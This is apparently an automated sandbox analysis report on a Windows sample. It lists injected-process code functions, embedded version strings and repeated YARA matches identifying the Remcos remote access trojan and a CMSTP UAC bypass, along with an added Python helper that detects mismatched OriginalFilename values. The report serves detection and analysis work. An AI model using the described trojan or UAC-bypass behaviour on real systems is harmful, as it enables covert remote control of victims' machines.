Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02D8BCF4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: 0_2_02DDDD5B
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02946254
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02951377
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0295D098
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_029720D2
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0293D071
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_029561AA
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02957150
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_029467CB
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0296C739
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0293E5DF
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02952A49
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0295C9DD
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0295CE3B
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02960E20
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02946E73
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02946FAD
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02972F00
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02932F45
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_0295CC0C
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 6_2_02954D22
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E374B1
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E44875
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E3540A
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E34C10
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E54191
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E39144
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E5695A
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E44EC1
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E43EB3
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E45A86
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E5769E
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E53E66
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E3D660
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E36E57
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E37A34
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E3EE03
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E40BF0
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E40740
Source: C:\Users\Public\alpha.pif | Code function: 9_2_00E36B20
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E374B1
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E44875
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E3540A
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E34C10
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E54191
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E39144
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E5695A
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E44EC1
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E43EB3
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E45A86
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E5769E
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E53E66
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E3D660
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E36E57
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E37A34
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E3EE03
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E40BF0
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E40740
Source: C:\Users\Public\alpha.pif | Code function: 11_2_00E36B20
Source: C:\Users\Public\xpha.pif | Code function: 12_2_00841E26
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: 15_2_02E220C4
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02966254
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02971377
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_0297D098
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_029920D2
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_0295D071
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_029761AA
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02977150
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_029667CB
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_0298C739
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_0295E5DF
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02972A49
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_0297C9DD
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_0297CE3B
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02980E20
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02966E73
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02966FAD
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02992F00
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02952F45
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_0297CC0C
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 19_2_02974D22
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: String function: 02D489D0 appears 45 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: String function: 02DB9677 appears 38 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: String function: 02D344DC appears 74 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: String function: 02D4894C appears 56 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: String function: 02DEB540 appears 46 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: String function: 02D34860 appears 949 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: String function: 02D34500 appears 33 times
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe | Code function: String function: 02D346D4 appears 244 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 02953FB0 appears 55 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 02973FB0 appears 55 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 029220E7 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 02921F66 appears 49 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 029538A5 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 029420E7 appears 39 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 029738A5 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 02941F66 appears 49 times
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: String function: 02E24860 appears 683 times
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: String function: 02E3894C appears 50 times
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | Code function: String function: 02E246D4 appears 155 times
Source: jW3NEKvxH1.exe | Binary or memory string: OriginalFilename vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC9F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2145952303.0000000002856000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B82000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2293566287.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2266110150.00000000023B5000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2145952303.0000000002852000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2266672340.0000000002854000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000002.2266672340.0000000002850000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B53000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F96F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
Source: jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F96F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
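The "OriginalFilename ... vs jW3NEKvxH1.exe" entries above come from a string scan of the process's memory: a VERSIONINFO resource found there names a different binary (easinvoker.exe, LOADER.EXE, Truesight4) than the file on disk, which is a reliable sign that the loader carries other executables inside it. The raw strings also show the weakness of a plain dump, which runs on past the value's terminator ("easinvoker.exej%", "LOADER.EXEB"). The Python below is an added example, not Joe Sandbox code: it locates every VS_VERSIONINFO String record keyed OriginalFilename in a raw buffer, reads the UTF-16 value up to its own null terminator so no trailing bytes are picked up, and reports the values that do not match the on-disk name. The record builder and the dump buffer are constructed test input; the trailing junk bytes after the first record are my own and stand in for whatever follows the value in a real dump.

```python
"""Extract OriginalFilename values from raw PE/memory buffers.

Added example, not part of the Joe Sandbox report. A VS_VERSIONINFO 'String'
record is: WORD wLength, WORD wValueLength, WORD wType, UTF-16 szKey + NUL,
WORD padding to a DWORD boundary, UTF-16 Value + NUL.
"""
import struct

KEY = "OriginalFilename".encode("utf-16-le") + b"\x00\x00"


def build_versioninfo_string(key, value):
    """Build one VS_VERSIONINFO String record (used here only to construct test input)."""
    key_b = key.encode("utf-16-le") + b"\x00\x00"
    val_b = value.encode("utf-16-le") + b"\x00\x00"
    pad = (-(6 + len(key_b))) % 4          # Value must start DWORD-aligned
    body = key_b + b"\x00" * pad + val_b
    # wType = 1 means text; wValueLength counts WCHARs including the terminator
    return struct.pack("<HHH", 6 + len(body), len(val_b) // 2, 1) + body


def original_filenames(blob):
    """Return every OriginalFilename value found in a raw buffer, in order."""
    found = []
    pos = 0
    while True:
        i = blob.find(KEY, pos)
        if i < 0:
            return found
        j = i + len(KEY)
        # skip the alignment padding (zero WORDs) between key and value
        while j + 1 < len(blob) and blob[j:j + 2] == b"\x00\x00":
            j += 2
        end = j
        # the value ends at the first UTF-16 NUL; stop there, unlike a plain string dump
        while end + 1 < len(blob) and blob[end:end + 2] != b"\x00\x00":
            end += 2
        found.append(blob[j:end].decode("utf-16-le", errors="replace"))
        pos = end


def name_mismatches(blob, on_disk_name):
    """OriginalFilename values that differ (case-insensitively) from the file's real name."""
    return [v for v in original_filenames(blob) if v.lower() != on_disk_name.lower()]


# Constructed dump: two embedded version records separated by unrelated bytes.
SAMPLE_DUMP = (
    b"\x00" * 16
    + build_versioninfo_string("OriginalFilename", "easinvoker.exe")
    + b"j%\x00\x00" + b"\x90" * 8           # constructed filler after the first record
    + build_versioninfo_string("OriginalFilename", "LOADER.EXE")
    + b"\x00" * 8
)

if __name__ == "__main__":
    for name in name_mismatches(SAMPLE_DUMP, "jW3NEKvxH1.exe"):
        print("embedded OriginalFilename differs from on-disk name:", name)
```

Run it over a process memory dump or the sample itself; each mismatch is a candidate embedded payload worth carving out and hashing separately, since the outer file's hash tells you nothing about what it drops.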
Source: jW3NEKvxH1.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
